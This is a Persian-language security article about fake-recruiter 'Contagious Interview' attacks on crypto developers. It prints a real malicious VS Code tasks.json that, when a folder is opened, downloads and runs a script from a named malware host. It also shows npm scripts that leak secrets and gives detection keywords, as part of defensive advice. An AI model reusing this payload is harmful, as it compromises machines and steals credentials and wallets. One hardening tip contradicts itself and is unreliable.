مصاحبه مسری: چگونه استخدام‌کنندگان جعلی توسعه‌دهندگان را هک می‌کنند

خلاصه: موج جدیدی از حملات تحت حمایت دولت، توسعه‌دهندگان برتر کریپتو را هدف قرار داده است. کلاهبرداران خود را به عنوان استخدام‌کننده یا CTO جا می‌زنند و نامزدها را مجبور می‌کنند کد مخرب را باز کنند. این مقاله پرونده "Martin Erazo"، اکسپلویت "tasks.json" در VS Code و "پروتکل سوزاندن" لازم برای بقا را بررسی می‌کند.

سلب مسئولیت: این مقاله به حوادث امنیت سایبری اشاره می‌کند که در آن از هویت جعلی افراد واقعی استفاده شده است. نام‌های "Martin Erazo" و "Ara Vartanian" به پرسوناهای استفاده شده توسط مهاجمان اشاره دارد. ما معتقدیم افراد واقعی پشت این نام‌ها قربانیان بی‌گناه سرقت هویت هستند.

---

---

۱. قربانی کامل: پرسونای "Martin Erazo"

با پیامی شروع می‌شود که تمام دکمه‌های درست را برای یک توسعه‌دهنده ارشد فشار می‌دهد:

• نقش: CTO / معمار ارشد
• بودجه: ۶ میلیون دلار بودجه تضمین شده
• تکنولوژی: Web3، هوش مصنوعی، زیرساخت غیرمتمرکز

در حمله‌ای که اخیراً تایید شده، استخدام‌کننده‌ای به نام "Martin Erazo" از طریق لینکدین تماس می‌گیرد. پروفایل از نام و عکس یک کارگردان تئاتر واقعی استفاده می‌کند، اما سابقه کاری جعلی است و ناگهان در سال ۲۰۲۵ به "مدیریت پروژه IT" تغییر می‌کند - نشانه‌ای کلاسیک از حساب کاربری لو رفته یا خریداری شده.

کلاهبرداری سریع پیش می‌رود. آنها غربالگری معمول منابع انسانی را رد می‌کنند و مستقیماً به "مصاحبه فنی" با یک مدیر ارشد می‌روند - در این مورد، تقلید از CTO واقعی صنعت Ara Vartanian (در حال حاضر در Limit Break).

پرچم قرمز: نام پروژه‌ها دائماً تغییر می‌کند. استخدام‌کننده "Betfin" (پلتفرم GameFi) را می‌فروشد، اما اسلاید ارسالی برای "SpaceXView" (پروژه متاورس) است. این عدم تطابق سرنخی است که کلاهبرداران دارایی‌ها را بین کمپین‌ها بازیافت می‌کنند.

۲. تله: "می‌تونی کد MVP ما رو بررسی کنی؟"

"CTO" جعلی ادعا می‌کند که برای بررسی کدبیس MVP (حداقل محصول قابل ارائه) به چشمان متخصص شما نیاز دارند. آنها لینکی به مخزن گیت‌هاب یا فایل ZIP می‌فرستند و شما را تحت فشار می‌گذارند تا آن را در طول مصاحبه یا بلافاصله بعد از آن باز کنید.

اینجا جایی است که هک اتفاق می‌افتد.

آنها تمایل شما به کمک و غرور شما را مسلح می‌کنند. فکر می‌کنید دارید دنبال باگ در کامپوننت React می‌گردید. در واقعیت، "باگ" یک "ویژگی" است که برای دزدیدن پس‌انداز زندگی شما طراحی شده است.

۳. نفوذ فنی: بدافزار بدون کلیک (Zero-Click Malware)

مهاجمان از اکسپلویت‌های "بدون کلیک" یا "کم کلیک" استفاده می‌کنند که ابزارهای توسعه‌دهنده را هدف قرار می‌دهند. نیازی به اجرای برنامه نیست؛ فقط باز کردن پوشه کافی است.

سلاح: .vscode/tasks.json

در این مورد خاص، مخزن حاوی فایل .vscode/tasks.json آلوده بود. این فایل به VS Code می‌گوید چگونه پروژه را بیلد کند.

کد مخرب:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": این ماشه است. به محض اینکه پوشه را در VS Code باز کنید، این تسک به طور خودکار اجرا می‌شود.
• Payload: از curl برای دانلود اسکریپت از vscodesettingtask.vercel.app استفاده می‌کند - هاست بدافزار شناخته شده که خود را به عنوان API تنظیمات جا می‌زند.
• نتیجه: اسکریپت در حافظه اجرا می‌شود و فوراً رمزهای عبور کروم، کوکی‌های نشست و کلیدهای SSH را می‌دزدد.

نقشه B: اسکریپت‌های package.json

اگر هک VS Code شکست بخورد، آنها اسکریپت‌های npm دارند:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

اجرای npm install یا npm start اسکریپت server/server.js را فعال می‌کند - یک اسکریپت C2 (فرمان و کنترل) محلی که متغیرهای محیطی (کلیدهای AWS، سیدهای کیف پول) را به مهاجم نشت می‌دهد.

۴. پرچم‌های قرمز در مقابل پرچم‌های سبز

چگونه این را قبل از اینکه خیلی دیر شود تشخیص دهیم؟

اگر توسعه‌دهنده هستید، "مخازن خصوصی" (Private Repos) یا فایل‌های ZIP باید هشدارهای سطح بالا را فعال کنند. شرکت‌های قانونی از مخازن عمومی یا پلتفرم‌های تست استاندارد استفاده می‌کنند.

هشدار: این تنها بردار حمله علیه توسعه‌دهندگان نیست. درباره تله همکاری در دیسکورد و اینکه چطور حملات زنجیره تامین وابستگی‌ها را خطرناک می‌کنند، بخوانید.

۵. پروتکل امنیت: چگونه ایمن مصاحبه کنیم

اگر توسعه‌دهنده ارشد هستید، شکار خواهید شد. سخت‌سازی محیط شما الزامی است.

پروتکل ۱: محیط "یک‌بار مصرف" (Burner)

هرگز از ایستگاه کاری اصلی خود برای تست کد استفاده نکنید.

• ماشین‌های مجازی: از VirtualBox یا VMWare استفاده کنید.
• محیط‌های توسعه ابری: از GitHub Codespaces یا Gitpod استفاده کنید. آنها فانی هستند و از فایل‌های کیف پول محلی شما ایزوله شده‌اند.

پروتکل ۲: ممیزی قانونی

قبل از باز کردن کد غریبه:

۱. چک کردن .vscode/tasks.json: دنبال runOn: folderOpen بگردید. ۲. چک کردن package.json: دنبال اسکریپت‌های preinstall یا postinstall مشکوک بگردید. ۳. کلمات کلیدی: برای curl, wget, os.homedir(), .ssh, wallet دستور grep بزنید.

پروتکل ۳: سخت‌سازی VS Code

گزینه "Workspace Trust" را به صورت جهانی غیرفعال کنید.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
• این VS Code را مجبور می‌کند قبل از اجرای تسک‌های سطح پوشه اجازه بگیرد.

۶. راه حل: "پروتکل سوزاندن" (Burn Protocol)

اگر مخزن مخربی (مانند آنچه پرسونای "Martin Erazo" فرستاد) را باز کردید، فرض کنید لو رفته‌اید. ریست کردن تنها کافی نیست.

۱. قطع اتصال: کابل شبکه را فوراً بکشید. ۲. سوزاندن کیف پول‌ها: کلیدهای خصوصی شما نشت کرده است. کیف پول‌های جدید روی دستگاه تمیز (گوشی) بسازید و وجوه باقی‌مانده را منتقل کنید. هرگز از سید قدیمی استفاده نکنید. ۳. کشتن نشست‌ها: از تمام نشست‌های گوگل، گیت‌هاب، AWS خارج شوید. توکن‌ها را فعالانه ابطال کنید. ۴. چک کردن کلید SSH: تنظیمات گیت‌هاب/گیت‌لب را چک کنید. مهاجمان اغلب کلید SSH خودشان را اضافه می‌کنند تا دسترسی در پشتی را حفظ کنند. هر چیزی را که نمی‌شناسید حذف کنید. ۵. نابود سازی (Nuke It): درایو را پاک کنید و سیستم عامل را دوباره نصب کنید. این تنها راهی است که ۱۰۰٪ مطمئن شوید روت‌کیت‌ها رفته‌اند.

نتیجه‌گیری

کلاهبرداری "مصاحبه مسری" از تخصص خودتان علیه شما استفاده می‌کند. این آرزوی شما برای حل مشکلات را هدف می‌گیرد. اما در Web3، پارانویا یک فضیلت حرفه‌ای است. هر هویتی را تایید کنید، هر مخزنی را ایزوله کنید و هرگز به "استخدام‌کننده‌ای" که برای اجرای کد عجله دارد اعتماد نکنید.